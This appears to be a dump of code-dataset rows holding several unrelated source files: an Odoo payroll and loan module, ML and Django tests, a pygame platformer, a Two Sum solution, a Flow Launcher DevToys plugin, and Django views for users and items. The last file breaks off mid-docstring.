seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
74918582185 | # -*- coding: utf-8 -*-
import datetime
from dateutil import rrule
from odoo import models, fields, api, _
from odoo.exceptions import UserError
class Loan(models.Model):
    """Employee loan with a running total of payroll deductions.

    Lifecycle: ``draft`` (editable) -> ``open`` (being deducted, via
    :meth:`action_open`) -> ``done`` (fully deducted, set by
    :meth:`_compute_state` once deductions cover the loan amount).
    """

    _name = "hr.loan"
    _description = 'Employee Loans'

    @api.model
    def _default_currency(self):
        """Default to the current user's company currency."""
        return self.env.user.company_id.currency_id.id

    # All data fields are editable only while the loan is still in draft.
    employee_id = fields.Many2one('hr.employee', string="Employee", readonly=True,
                                  states={'draft': [('readonly', False)]})
    date_from = fields.Date('From Date', readonly=True, states={'draft': [('readonly', False)]})
    date_to = fields.Date('To Date', readonly=True, states={'draft': [('readonly', False)]})
    currency_id = fields.Many2one('res.currency', default=_default_currency, string="Currency", readonly=True,
                                  states={'draft': [('readonly', False)]})
    amount_total = fields.Monetary(string="Total Loan Amount", readonly=True, states={'draft': [('readonly', False)]})
    amount_deduct = fields.Monetary(string="Deduction Amount", readonly=True, states={'draft': [('readonly', False)]})
    type = fields.Selection([('sss', 'SSS'), ('hdmf', 'HDMF'), ('other', 'OTHER')], string='Type', readonly=True,
                            states={'draft': [('readonly', False)]})
    amount_total_deducted = fields.Monetary(string="Total Deducted Amount", readonly=True,
                                            states={'draft': [('readonly', False)]})
    # NOTE(review): declared with store=True but no compute=; the state is
    # written directly and _compute_state is invoked manually from payroll
    # confirmation -- confirm this is intentional.
    state = fields.Selection([('draft', 'Draft'), ('open', 'In Progress'), ('done', 'Done')], string="Status",
                             default="draft", store=True)

    @api.one
    def _compute_state(self):
        """Mark the loan done once deductions cover the loan amount.

        Called explicitly (not via compute=) after payslip confirmation.
        """
        if self.amount_total_deducted >= self.amount_total:
            self.state = 'done'

    @api.multi
    def action_open(self):
        """Move the loan(s) into the In Progress state."""
        self.write({'state': 'open'})

    @api.multi
    def unlink(self):
        """Forbid deleting loans that are already open or fully paid."""
        for loan in self:
            if loan.state in ['open', 'done']:
                raise UserError(_('Deleting of open or paid loans is not allowed.'))
        return super(Loan, self).unlink()

    @api.multi
    def name_get(self):
        """Display loans as ``[<amount with currency symbol>] <employee>``.

        NOTE(review): when the currency position is neither 'before' nor
        'after', ``amount_str`` stays the float 0.0 -- confirm positions are
        always one of the two values.
        """
        result = []
        for loan in self:
            amount_str = 0.0
            if loan.currency_id.position == 'before':
                amount_str = loan.currency_id.symbol + ' ' + str(loan.amount_total)
            if loan.currency_id.position == 'after':
                amount_str = str(loan.amount_total) + ' ' + loan.currency_id.symbol
            result.append((loan.id, "[%s] %s" % (amount_str, loan.employee_id.name)))
        return result
class TripTemplate(models.Model):
    """Reusable trip definition (route plus amount) used to prefill trips."""

    _name = "ibas_hris.trip_template"
    _description = 'TRIP TEMPLATE'

    @api.model
    def _default_currency(self):
        """Default to the current user's company currency."""
        return self.env.user.company_id.currency_id.id

    name = fields.Char('Name', compute="_compute_name", store=True)
    loc_from = fields.Char('From Location', required=True)
    loc_to = fields.Char('To Location', required=True)
    currency_id = fields.Many2one('res.currency', default=_default_currency, string="Currency")
    amount = fields.Monetary(string="Amount", required=True)

    @api.depends('loc_from', 'loc_to')
    def _compute_name(self):
        """Compute the display name as ``<from> -> <to>``.

        Fix: compute methods receive a (possibly multi-record) recordset;
        the original assigned ``self.name`` directly, which fails when the
        recordset contains more than one template.
        """
        for template in self:
            template.name = (template.loc_from or '') + ' -> ' + (template.loc_to or '')
class Trip(models.Model):
    """A single employee trip; route and amount can be prefilled from a
    trip template via the onchange below."""

    _name = "ibas_hris.trip"
    _description = 'TRIPS'

    @api.model
    def _default_currency(self):
        """Default to the current user's company currency."""
        return self.env.user.company_id.currency_id.id

    date = fields.Date('Date', required=True)
    trip_template_id = fields.Many2one('ibas_hris.trip_template', string='Template')
    loc_from = fields.Char('From Location', required=True)
    loc_to = fields.Char('To Location', required=True)
    currency_id = fields.Many2one('res.currency', default=_default_currency, string="Currency")
    amount = fields.Monetary(string="Amount", required=True)
    employee_id = fields.Many2one('hr.employee', string="Employee", required=True)

    @api.multi
    def name_get(self):
        """Display trips as ``[<employee>] <from> -> <to>``."""
        result = []
        for trip in self:
            result.append((trip.id, "[%s] %s" % (trip.employee_id.name, (trip.loc_from or '') + ' -> ' + (trip.loc_to or ''))))
        return result

    @api.onchange('trip_template_id')
    def _onchange_trip_template_id(self):
        """Copy route and amount from the selected template onto the trip."""
        if self.trip_template_id:
            self.loc_from = self.trip_template_id.loc_from
            self.loc_to = self.trip_template_id.loc_to
            self.amount = self.trip_template_id.amount
class Employee(models.Model):
    """hr.employee extension linking loans and trips and exposing a
    year-to-date net-pay helper used by payroll."""

    _inherit = 'hr.employee'

    loan_ids = fields.One2many('hr.loan', 'employee_id', string='Loans')
    trip_ids = fields.One2many('ibas_hris.trip', 'employee_id', string='Trips')

    @api.model
    def _current_year_avg_net_pay(self, current_payslip=None):
        """Sum the NETPAY line totals of this employee's payslips dated in
        the current calendar year, excluding *current_payslip*.

        NOTE(review): despite the name this returns a *sum*, not an
        average, and it reads ``self.id`` while decorated ``@api.model``
        (where ``self`` is normally the model, not a record) -- presumably
        invoked on a single employee record; confirm the decorator.
        """
        date_from = datetime.date.today().strftime('%Y-01-01')
        date_to = datetime.date.today().strftime('%Y-12-31')
        payslips = self.env['hr.payslip'].search(
            [('employee_id', '=', self.id), ('date_from', '>=', date_from), ('date_from', '<=', date_to),
             ('id', '!=', current_payslip.id)])
        lines = payslips.mapped('line_ids').filtered(lambda r: r.code == 'NETPAY')
        return sum(lines.mapped('total'))
class Payslip(models.Model):
    """hr.payslip extension computing Philippine-payroll worked-day lines
    (lates, undertime, absences, the six overtime buckets, holiday/restday
    work and total hours) from attendance and overtime records, and posting
    loan deductions on payslip confirmation.
    """

    _inherit = 'hr.payslip'

    deduct_sss = fields.Boolean('Deduct SSS')
    deduct_philhealth = fields.Boolean('Deduct Philhealth')
    deduct_hdmf = fields.Boolean('Deduct HDMF')
    generate_backpay = fields.Boolean('Generate 13 th Month Pay / BackPay')

    @staticmethod
    def _worked_day_vals(name, sequence, code, hours, contract_id):
        """Build one worked-days line dict; one day is assumed to be 8 hours."""
        return {
            'name': name,
            'sequence': sequence,
            'code': code,
            'number_of_days': hours / 8.0,
            'number_of_hours': hours,
            'contract_id': contract_id,
        }

    @api.model
    def get_worked_day_lines(self, contracts, date_from, date_to):
        """Extend the standard worked-day lines with the attendance-derived
        buckets HR-2 .. HR-10 for this payslip's employee/contract."""
        res = super(Payslip, self).get_worked_day_lines(contracts, date_from, date_to)
        att_obj = self.env['hr.attendance']
        contract = self.contract_id
        employee = self.employee_id
        # An employee-specific schedule wins over the contract calendar.
        resource_calendar_id = employee.work_sched or contract.resource_calendar_id
        attendances = att_obj.search(
            [('employee_id', '=', contract.employee_id.id), ('check_in', '>=', date_from), ('check_in', '<=', date_to)])
        # HR-2, 3, 5, 6, 7, 8, 9, 10
        late_in_float = 0.0
        undertime_minutes = 0.0
        regular_holiday_worked_hours = 0.0
        special_holiday_worked_hours = 0.0
        restday_regular_holiday_worked_hours = 0.0
        restday_special_holiday_worked_hours = 0.0
        actual_worked_hours = 0.0
        restday_hours = 0.0
        for att in attendances:
            # Cap a single attendance at 8 payable hours.  (The original
            # `x < 8 and x or 8` idiom wrongly yielded 8 when x == 0.)
            capped_hours = min(att.worked_hours, 8.0)
            if att.is_workday:
                if att.is_tardy:
                    late_in_float += att.late_in_float
                if att.is_undertime:
                    undertime_minutes += att.undertime_minutes
                if att.is_regular:
                    regular_holiday_worked_hours += capped_hours
                if att.is_special:
                    special_holiday_worked_hours += capped_hours
            else:
                if att.is_regular:
                    restday_regular_holiday_worked_hours += capped_hours
                if att.is_special:
                    restday_special_holiday_worked_hours += capped_hours
                restday_hours += capped_hours
            # NOTE(review): every attendance (workday or restday) counts
            # towards NORMWD -- confirm restdays should be included.
            actual_worked_hours += capped_hours
        # HR-4: a day is an absence when it is a scheduled working day,
        # not a declared holiday, and has no workday attendance.
        absences = 0
        for day in rrule.rrule(rrule.DAILY, dtstart=fields.Datetime.from_string(date_from),
                               until=fields.Datetime.from_string(date_to).replace(hour=23, minute=59, second=59,
                                                                                  microsecond=999999)):
            if not attendances.filtered(lambda r: str(day) <= r.check_in <= str(
                    day.replace(hour=23, minute=59, second=59, microsecond=999999)) and r.is_workday):
                work_hours = employee.get_day_work_hours_count(day, calendar=resource_calendar_id)
                if work_hours:
                    holiday = self.env['ibas_hris.holiday'].search([('date', '=', day.date())])
                    if not holiday:
                        absences += 1
        # HR-5: bucket approved overtime by the type of day it was rendered.
        overtimes = self.env['ibas_hris.ot'].search(
            [('state', '=', 'approved'), ('overtime_from', '>=', date_from + ' 00:00:00'),
             ('overtime_from', '<=', date_to + ' 23:59:59'), ('employee_id', '=', employee.id)])
        regular_ot_minutes = 0.0
        restday_ot_minutes = 0.0
        regular_holiday_ot_minutes = 0.0
        special_holiday_ot_minutes = 0.0
        regular_holiday_restday_ot_minutes = 0.0
        special_holiday_restday_ot_minutes = 0.0
        for ot in overtimes:
            # Fix: classify by the day the overtime was actually rendered;
            # the original derived ot_day from `date_from`, putting every
            # overtime in the bucket of the payslip's first day.
            ot_day = fields.Datetime.from_string(ot.overtime_from).date()
            ot_day_work_hours = employee.get_day_work_hours_count(ot_day, calendar=resource_calendar_id)
            ot_day_holiday = self.env['ibas_hris.holiday'].search([('date', '=', ot_day)])
            # Fix: accumulate with `+=`; the original `= + ot.ot_minutes`
            # overwrote the running total on every iteration.
            if ot_day_work_hours and not ot_day_holiday:  # Regular Overtime
                regular_ot_minutes += ot.ot_minutes
            elif not ot_day_work_hours and not ot_day_holiday:  # Restday Overtime
                restday_ot_minutes += ot.ot_minutes
            if ot_day_work_hours and ot_day_holiday and ot_day_holiday.holiday_type == 'regular':  # Regular Holiday Overtime
                regular_holiday_ot_minutes += ot.ot_minutes
            if ot_day_work_hours and ot_day_holiday and ot_day_holiday.holiday_type == 'special':  # Special Holiday Overtime
                special_holiday_ot_minutes += ot.ot_minutes
            if not ot_day_work_hours and ot_day_holiday and ot_day_holiday.holiday_type == 'regular':  # Regular Holiday Restday Overtime
                regular_holiday_restday_ot_minutes += ot.ot_minutes
            if not ot_day_work_hours and ot_day_holiday and ot_day_holiday.holiday_type == 'special':  # Special Holiday Restday Overtime
                special_holiday_restday_ot_minutes += ot.ot_minutes
        cid = contract.id
        res.extend([
            self._worked_day_vals(_("Lates"), 1, 'LATE', late_in_float / 60.00, cid),  # HR-2
            self._worked_day_vals(_("UNDERTIME"), 2, 'UNDERTIME', undertime_minutes / 60.00, cid),  # HR-3
            self._worked_day_vals(_("ABSENT"), 3, 'ABSENT', absences * 8.00, cid),  # HR-4
            self._worked_day_vals(_("Overtime"), 4, 'OT', regular_ot_minutes / 60, cid),  # HR-5 (a)
            self._worked_day_vals(_("Restday Overtime"), 4, 'RDOT', restday_ot_minutes / 60, cid),  # HR-5 (b)
            self._worked_day_vals(_("Regular Holiday Overtime"), 4, 'RHOT', regular_holiday_ot_minutes / 60, cid),  # HR-5 (c)
            self._worked_day_vals(_("Special Holiday Overtime"), 4, 'SHOT', special_holiday_ot_minutes / 60, cid),  # HR-5 (d)
            self._worked_day_vals(_("Restday Regular Holiday Overtime"), 4, 'RDRHOT', regular_holiday_restday_ot_minutes / 60, cid),  # HR-5 (e)
            self._worked_day_vals(_("Restday Special Holiday Overtime"), 4, 'RDSHOT', special_holiday_restday_ot_minutes / 60, cid),  # HR-5 (f)
            self._worked_day_vals(_("Regular Holiday"), 5, 'RH', regular_holiday_worked_hours, cid),  # HR-6
            self._worked_day_vals(_("Special Holiday"), 6, 'SH', special_holiday_worked_hours, cid),  # HR-7
            self._worked_day_vals(_("Restday Regular Holiday"), 7, 'RDRH', restday_regular_holiday_worked_hours, cid),  # HR-8
            self._worked_day_vals(_("Actual Days Worked"), 8, 'NORMWD', actual_worked_hours, cid),  # HR-9
            self._worked_day_vals(_("Restday Special Holiday"), 9, 'RDSH', restday_special_holiday_worked_hours, cid),  # HR-10
            self._worked_day_vals(_("Restday"), 10, 'RD', restday_hours, cid),  # HR-10
        ])
        return res

    @api.multi
    def action_payslip_done(self):
        """Confirm the payslip, then post any loan-deduction payslip lines
        (SSSLOAN / HDMFLOAN / OTHLOAN) against the employee's first open
        loan of the matching type."""
        res = super(Payslip, self).action_payslip_done()
        code_to_loan_type = {'SSSLOAN': 'sss', 'HDMFLOAN': 'hdmf', 'OTHLOAN': 'other'}
        for rec in self:
            for line in rec.line_ids:
                loan_type = code_to_loan_type.get(line.code)
                if not loan_type:
                    continue
                loans = rec.employee_id.loan_ids.filtered(
                    lambda r: r.state == 'open' and r.type == loan_type)
                if loans:
                    loan = loans[0]
                    # Fix: read the deducted total from the single loan being
                    # written; the original read it from the whole filtered
                    # recordset, which raises when several loans of one type
                    # are open at once.
                    loan.write({'amount_total_deducted': loan.amount_total_deducted + line.total})
                    loans._compute_state()
        return res
| lawrence24/ndms-1 | ibas_payroll/models/models.py | models.py | py | 15,973 | python | en | code | 0 | github-code | 36 |
75188620264 | import unittest
import numpy as np
from numpy.linalg import norm
import hmcollab.models
from hmcollab import directories
from hmcollab import articles
from hmcollab.tests.fake_data import articles_random_df
# This suite tests the following:
# + The articles dataset and its preprocessing, e.g. the shape of the data
#   and the one-hot encoding implementation.
#   These could be rewritten as plain unit tests: one-hot encoding and
#   index handling can be verified with a small synthetic dataset
#   consisting of a couple of categorical columns and a numerical index
#   column whose IDs start at 0.
# + Integration tests checking results from KNN.
#   We may want to remove these and keep KNN integration tests only in the
#   model test suite.
class TestArticles(unittest.TestCase):
    """Tests for article feature munging and the KNN article model."""

    def setUp(self):
        # Reference one-hot matrix saved as test data, plus a reproducible
        # random articles dataframe of 17 rows.
        self.simple_onehot = np.load(directories.testdata("simple_onehot.npy"))
        self.articles = articles_random_df(17)

    def tearDown(self):
        pass

    def get_simple(self):
        """Munger restricted to the ``color`` and ``article`` features."""
        return articles.ArticleFeatureMungerSpecificFeatures(
            self.articles,
            [
                "color",
                "article",
            ],
        )

    def get_simple_knn(self):
        """KNN model over the simple munger's feature matrix with k=4."""
        return hmcollab.models.ArticleKNN(self.get_simple().x, 4)

    def test_article_simple_feature_array(self):
        """One-hot matrix has the expected shape and matches the saved reference."""
        a = self.get_simple()
        expected = (17, 5)
        actual = a.x.shape
        self.assertEqual(expected, actual)
        # number of rows in original dataframe should be same as in matrix representation
        expected, _ = a.df.shape
        actual, _ = a.x.shape
        self.assertEqual(expected, actual)
        # test that actual onehot values are the same as a previously saved example
        expected = self.simple_onehot
        actual = a.x.values
        self.assertEqual(0, norm(actual - expected))

    def test_id_from_index(self):
        """Positional index 2 maps back to article id "02"."""
        a = self.get_simple()
        expected = "02"
        actual = a.id_from_index(2)
        self.assertEqual(expected, actual)

    def knn_test(self, d, indices):
        """Shared assertions: the 4 nearest neighbours of the query row are
        exact matches (distance 0) at rows {3, 4, 6, 10}."""
        # check that actual distances match expected
        expected = np.array([0.0, 0.0, 0.0, 0])
        actual = np.array(d[0])
        self.assertAlmostEqual(0, norm(actual - expected))
        # check that actual indices match expected
        expected = {3, 4, 6, 10}
        actual = set(indices[0])
        self.assertEqual(expected, actual)

    def test_knn_by_row(self):
        """Query KNN with a raw feature row from the saved one-hot matrix."""
        knn = self.get_simple_knn()
        x = self.simple_onehot
        # choose row 10, for which there are two other exact matches
        row = x[10]
        d, indices = knn.nearest(row=row)
        self.knn_test(d, indices)

    def test_knn_by_index(self):
        """Query KNN with a row taken from the munger's own matrix."""
        a = self.get_simple()
        knn = self.get_simple_knn()
        x = self.simple_onehot
        # choose row 10, for which there are two other exact matches
        row = a.x.values[10]
        d, indices = knn.nearest(row)
        self.knn_test(d, indices)
| newexo/HM-clothing-public | hmcollab/tests/test_articles.py | test_articles.py | py | 2,941 | python | en | code | 0 | github-code | 36 |
37229157121 | import pygame
from player import *
from blocks import *
from pyganim import *
# window
WIN_WIDTH = 800 # Ширина создаваемого окна
WIN_HEIGHT = 640 # Высота
DISPLAY = (WIN_WIDTH, WIN_HEIGHT) # Группируем ширину и высоту в одну переменную
BACKGROUND_COLOR = (0, 64, 0)
NAME = "Battle of one"
ANIMATION_DELAY = 0.1 # скорость смены кадров
def main():
    """Run the game: build the tile level, then loop handling input,
    physics and rendering at 60 FPS.

    (Fix: removed an unused ``pygame.key.get_pressed()`` lookup from the
    event loop; translated the Russian comments.)
    """
    pygame.init()  # initialise pygame (required before any other call)
    screen = pygame.display.set_mode(DISPLAY)  # create the window
    pygame.display.set_caption(NAME)  # window title
    surf = pygame.Surface(DISPLAY)
    surf.fill(BACKGROUND_COLOR)
    hero = Player(55, 55)  # create the hero at (x, y)
    left = right = False  # standing still by default
    up = False
    entities = pygame.sprite.Group()  # every drawable object
    platforms = []  # everything the hero can collide with or stand on
    entities.add(hero)
    # NOTE(review): the level rows appear whitespace-collapsed in this copy;
    # each row should presumably be 25 characters wide -- confirm spacing.
    level = ["_________________________",
             "_ _",
             "_ _",
             "_ _",
             "_ _",
             "_ _",
             "_ _",
             "_ _____",
             "_ _",
             "_ _",
             "_ _ _",
             "_ ____ _",
             "_ _",
             "_ _ _",
             "_ __ _",
             "_ _",
             "_ _________ _",
             "_ _",
             "_ _",
             "_________________________"]
    timer = pygame.time.Clock()
    x = y = 0  # current tile coordinates
    for row in level:
        for col in row:
            if col == "_":
                platform = Platform(x, y)
                entities.add(platform)
                platforms.append(platform)
            x = x + PLATFORM_WIDTH  # platform tiles advance by tile width
        y = y + PLATFORM_HEIGHT  # same for the height, per row
        x = 0  # start each new row from the left edge
    while True:  # main game loop
        timer.tick(60)  # fps = 60
        for e in pygame.event.get():
            if e.type == KEYDOWN and e.key == K_UP:
                up = True
            if e.type == KEYUP and e.key == K_UP:
                up = False
            if e.type == KEYDOWN and e.key == K_LEFT:
                left = True
            if e.type == KEYDOWN and e.key == K_RIGHT:
                right = True
            if e.type == KEYUP and e.key == K_RIGHT:
                right = False
            if e.type == KEYUP and e.key == K_LEFT:
                left = False
            if e.type == pygame.QUIT:
                exit()
        screen.blit(surf, (0, 0))  # redraw the background every frame
        hero.update(left, right, up, platforms)  # movement / physics
        entities.draw(screen)  # draw everything
        pygame.display.update()  # flip all changes to the screen


if __name__ == "__main__":
    main()
| Cruciano/Totsuka-Blade | game.py | game.py | py | 3,608 | python | ru | code | 0 | github-code | 36 |
42883305614 |
class Solution:
    """LeetCode "Two Sum"."""

    def twoSum(self, nums, target: int):
        """Return indices ``[i, j]`` (``i < j``) of two entries of *nums*
        that sum to *target*, or ``None`` if no such pair exists.

        Uses a value -> first-index hash map for a single O(n) pass instead
        of the original O(n^2) nested scan.  Assumes at most one valid pair
        (the LeetCode contract); with several valid pairs the returned pair
        may differ from the one the naive scan would find.
        """
        seen = {}  # value -> index of its first occurrence
        for j, value in enumerate(nums):
            complement = target - value
            if complement in seen:
                return [seen[complement], j]
            seen[value] = j
if __name__ == "__main__":
    # Quick manual check of the solver.
    solver = Solution()
    print(solver.twoSum([3, 3], 6))
24527321437 | import shutil
import tempfile
from ..models import Post, User, Comment
from django.conf import settings
from django.test import Client, TestCase, override_settings
from django.urls import reverse
from django.core.files.uploadedfile import SimpleUploadedFile
TEMP_MEDIA_ROOT = tempfile.mkdtemp(dir=settings.BASE_DIR)
@override_settings(MEDIA_ROOT=TEMP_MEDIA_ROOT)
class TestPostForm(TestCase):
    """Form tests for creating (with image upload) and editing posts."""

    @classmethod
    def setUpClass(cls):
        # One author and one pre-existing post shared by all tests.
        super().setUpClass()
        cls.post_text = 'Test Text PostForm'
        cls.user_name = 'PostForm'
        cls.user = User.objects.create_user(username=cls.user_name)
        cls.first_post = Post.objects.create(
            text=cls.post_text,
            author=cls.user,
        )

    def setUp(self):
        # An anonymous client plus a client logged in as the post author.
        self.guest_client = Client()
        self.authorized_client = Client()
        self.authorized_client.force_login(self.user)

    @classmethod
    def tearDownClass(cls):
        super().tearDownClass()
        # Remove the temporary MEDIA_ROOT holding uploaded test images.
        shutil.rmtree(TEMP_MEDIA_ROOT, ignore_errors=True)

    def test_create_post(self):
        """Check the post creation form."""
        # Minimal valid GIF payload used as the uploaded image.
        small_gif = (
            b'\x47\x49\x46\x38\x39\x61\x02\x00'
            b'\x01\x00\x80\x00\x00\x00\x00\x00'
            b'\xFF\xFF\xFF\x21\xF9\x04\x00\x00'
            b'\x00\x00\x00\x2C\x00\x00\x00\x00'
            b'\x02\x00\x01\x00\x00\x02\x02\x0C'
            b'\x0A\x00\x3B'
        )
        uploaded = SimpleUploadedFile(
            name='small.gif',
            content=small_gif,
            content_type='image/gif'
        )
        posts_count = Post.objects.count()
        Comment.objects.create(
            post=self.first_post,
            author=self.user,
            text='test text com'
        )
        form_post = {
            'text': 'TEXT',
            'author': self.user,
            'image': uploaded,
        }
        response = self.authorized_client.post(
            reverse('posts:post_create'),
            data=form_post,
            follow=True
        )
        # Creation redirects to the author's profile; the post (with its
        # image) and the comment created above must exist.
        self.assertRedirects(response, reverse('posts:profile', kwargs={
            'username': self.user_name
        }))
        self.assertEqual(Post.objects.count(), posts_count + 1)
        self.assertTrue(
            Post.objects.filter(text='TEXT', image='posts/small.gif').exists()
        )
        self.assertTrue(
            Comment.objects.filter(text='test text com').exists()
        )

    def test_edit_post(self):
        """Check the post edit form."""
        form_data = {
            'text': 'test_text',
            'author': self.user
        }
        response = self.authorized_client.post(
            reverse(
                'posts:post_edit',
                kwargs={'post_id': '1'}),
            data=form_data,
            follow=True
        )
        # Editing redirects back to the post detail page and the new text
        # must be stored.
        self.assertRedirects(
            response,
            reverse(
                'posts:post_detail',
                kwargs={'post_id': '1'}
            ))
        self.assertTrue(Post.objects.filter(text='test_text'))
| Gabrie1002/hw05_final | yatube/posts/tests/test_forms.py | test_forms.py | py | 3,092 | python | en | code | 1 | github-code | 36 |
32920662032 | # -*- coding: utf-8 -*-
import copy
from typing import List
from flowlauncher import FlowLauncher
from plugin.templates import *
from plugin.devtoys import *
class Main(FlowLauncher):
    """Flow Launcher plugin entry point: matches the query against the
    DevToys tool list and offers an action that launches the tool."""

    # NOTE(review): class-level mutable attribute shared by all instances;
    # each query appends here -- presumably a fresh plugin process/instance
    # handles each query so results do not accumulate; confirm.
    messages_queue = []

    def sendNormalMess(self, title: str, subtitle: str):
        """Queue a plain result entry with no click action."""
        message = copy.deepcopy(RESULT_TEMPLATE)
        message["Title"] = title
        message["SubTitle"] = subtitle
        self.messages_queue.append(message)

    def sendActionMess(self, title: str, subtitle: str, icopath: str, method: str, value: List):
        """Queue a result entry whose activation triggers ``method`` with
        ``value`` via JSON-RPC; an empty ``icopath`` keeps the template's
        default icon."""
        # information
        message = copy.deepcopy(RESULT_TEMPLATE)
        message["Title"] = title
        message["SubTitle"] = subtitle
        if icopath != "":
            message["IcoPath"] = icopath
        # action
        action = copy.deepcopy(ACTION_TEMPLATE)
        action["JsonRPCAction"]["method"] = method
        action["JsonRPCAction"]["parameters"] = value
        message.update(action)
        self.messages_queue.append(message)

    def query(self, param: str) -> List[dict]:
        """Return result entries for every DevToys tool whose key or display
        name contains the (case-insensitive) query string."""
        q = param.strip().lower()
        for tool in DEVTOYS_TOOLS:
            key = tool["tool"]
            name = tool["name"]
            icon = tool["icon"] if "icon" in tool else ""
            if q in key.lower() or q in name.lower():
                self.sendActionMess(name, key, icon, "startDevtoysTool", [key])
        return self.messages_queue

    def startDevtoysTool(self, tool):
        """JSON-RPC callback: launch the selected DevToys tool."""
        startTool(tool)
| umi-uyura/Flow.Launcher.Plugin.DevToysLauncher | plugin/ui.py | ui.py | py | 1,462 | python | en | code | 5 | github-code | 36 |
28212815026 | from django.shortcuts import get_object_or_404, render, redirect
from core.models import Item
from django.contrib.auth import login, logout, authenticate
from django.contrib.auth.models import User
import api.views as api
from core.forms import ItemCreateForm, UserCreateForm, UserLoginForm, UserUpdateForm
from django.contrib import messages
def index_view(request, q=None):
    """Render the item list, optionally filtered by a POSTed search query.

    ``q`` may come from the URL route (unused by default) or from the
    POSTed ``q`` field; when present, items are filtered by a
    case-insensitive name match and an info message is flashed.
    """
    item_list = Item.objects.all()
    if request.method == "POST":
        q = request.POST.get("q")
        messages.add_message(
            request, messages.INFO, f"Showing search results containing: `{q}`"
        )
        item_list = Item.objects.filter(name__icontains=q)
    context = {
        "item_list": item_list,
    }
    return render(request, "index.html", context=context)
def user_register_view(request):
    """Register a new user; on success log them in and redirect home.

    Already-authenticated users (on GET) are redirected to their own
    details page instead of seeing the form.
    """
    form = UserCreateForm(request.POST or None)
    if request.method == "POST":
        if form.is_valid():
            user = form.save()
            login(request, user)
            messages.add_message(
                request, messages.SUCCESS, "User was created successfully"
            )
            return redirect("core:index")
        else:
            messages.add_message(request, messages.ERROR, "Invalid Inputs.")
            return redirect("core:user_register")
    if request.user.is_authenticated:
        return redirect("core:user_details", request.user.pk)
    context = {"form": form, "type": "register"}
    return render(request, "user/user_create_update.html", context=context)
def user_list_view(request):
    """Render a page listing every registered user."""
    all_users = User.objects.all()
    return render(request, "user/user_list.html", context={"user_list": all_users})
def user_details_view(request, user_id: int):
    """Render the details page for one user; 404 when absent."""
    found = get_object_or_404(User, pk=user_id)
    return render(request, "user/user_details.html", context={"user": found})
def user_login_view(request):
    """Authenticate and log a user in.

    Already-authenticated users are redirected to their details page; a
    failed authentication flashes an error and re-renders the form.
    (Cleanup: removed commented-out manual credential extraction.)
    """
    if request.user.is_authenticated:
        return redirect("core:user_details", request.user.pk)
    form = UserLoginForm(request.POST or None)
    if request.method == "POST":
        if form.is_valid():
            user = authenticate(**form.cleaned_data)
            if user is not None:
                login(request, user)
                messages.add_message(request, messages.SUCCESS, "You have logged in.")
                return redirect("core:index")
            else:
                messages.add_message(request, messages.ERROR, "Invalid Credentials.")
    context = {"form": form}
    return render(request, "user/user_login.html", context=context)
def user_update_view(request):
    """Update the logged-in user's profile fields and/or password.

    Only non-empty form fields overwrite existing values.  The session is
    refreshed (logout + login) so a password change does not invalidate it.
    (Fixes: removed a leftover debug print; repaired the success message,
    which contained a stray ``<``.)
    """
    if not request.user.is_authenticated:
        messages.add_message(request, messages.ERROR, "You have to log in first.")
        return redirect("core:user_login")
    form = UserUpdateForm(request.POST or None)
    if request.method == "POST":
        user = get_object_or_404(User, pk=request.user.pk)
        if form.is_valid():
            new_data = {
                "first_name": form.cleaned_data.get("first_name"),
                "last_name": form.cleaned_data.get("last_name"),
                "username": form.cleaned_data.get("username"),
                "email": form.cleaned_data.get("email"),
            }
            password = form.cleaned_data.get("password")
            for key, val in new_data.items():
                if val:
                    setattr(user, key, val)
            if password:
                user.set_password(password)
            user.save()
            logout(request)
            login(request, user)
            messages.add_message(
                request, messages.SUCCESS, "Updated user data successfully."
            )
            return redirect("core:user_details", request.user.pk)
        else:
            messages.add_message(request, messages.ERROR, "Invalid inputs!")
    context = {"form": form, "type": "update"}
    return render(request, "user/user_create_update.html", context=context)
def user_logout_view(request):
    """Log the user out on POST; otherwise show the confirmation page."""
    if request.method != "POST":
        return render(request, "user/user_logout.html")
    logout(request)
    messages.add_message(request, messages.INFO, "You have been logged out.")
    return redirect("core:index")
def item_create_view(request):
    """Create an item owned by the logged-in user (supports file upload).

    (Cleanup: removed leftover ``print`` debug statements.)
    """
    if not request.user.is_authenticated:
        return redirect("core:user_login")
    form = ItemCreateForm(request.POST, request.FILES or None)
    if request.method == "POST":
        if form.is_valid():
            item = Item(**form.cleaned_data)
            item.user = request.user
            item.save()
            messages.add_message(request, messages.SUCCESS, "Item was Created.")
            return redirect("core:index")
        else:
            messages.add_message(
                request, messages.ERROR, "Invalid inputs for the Item."
            )
    context = {"form": form}
    return render(request, "item/item_create.html", context=context)
def item_details_view(request, item_id: int):
    """Render the details page of a single item; 404 when absent."""
    found = get_object_or_404(Item, pk=item_id)
    return render(request, "item/item_details.html", context={"item": found})
def item_delete_view(request, item_id: int):
    """Delete an item: owner-only; GET shows a confirmation page first."""
    if not request.user.is_authenticated:
        messages.add_message(request, messages.ERROR, "You should login first.")
        return redirect("core:user_login")
    item = get_object_or_404(Item, pk=item_id)
    if request.user != item.user:
        messages.add_message(
            request, messages.ERROR, "You can only delete items you own."
        )
        return redirect("core:index")
    if request.method == "POST":
        item.delete()
        messages.add_message(
            request, messages.SUCCESS, "Item was deleted successfully."
        )
        return redirect("core:index")
    context = {"item": item}
    return render(request, "item/item_delete.html", context=context)
def item_buy_view(request, item_id: int):
    """Buy an item: POST charges via the payment API, then deletes the item.

    NOTE(review): no login requirement and the buyer is never recorded --
    confirm anonymous purchases are intended.
    """
    item = get_object_or_404(Item, pk=item_id)
    if request.method == "POST":
        res = api.pay_for_item(item.price)
        if res.status_code != 200:
            messages.add_message(request, messages.ERROR, "Something went wrong!")
            # Fix: the original passed a set literal positionally to
            # redirect(), which cannot be reversed into a URL; pass the
            # route kwarg instead.
            return redirect("core:item_buy", item_id=item_id)
        item.delete()
        messages.add_message(request, messages.SUCCESS, "Item was bought successfully!")
        return redirect("core:index")
    return render(request, "item/item_buy.html", {"item": item})
def user_item_list_view(request, user_id: int):
    """List every item owned by the user with primary key ``user_id``.

    Fix: the flash message previously showed ``request.user.username``
    (the *viewer*, possibly anonymous) instead of the listed owner; the
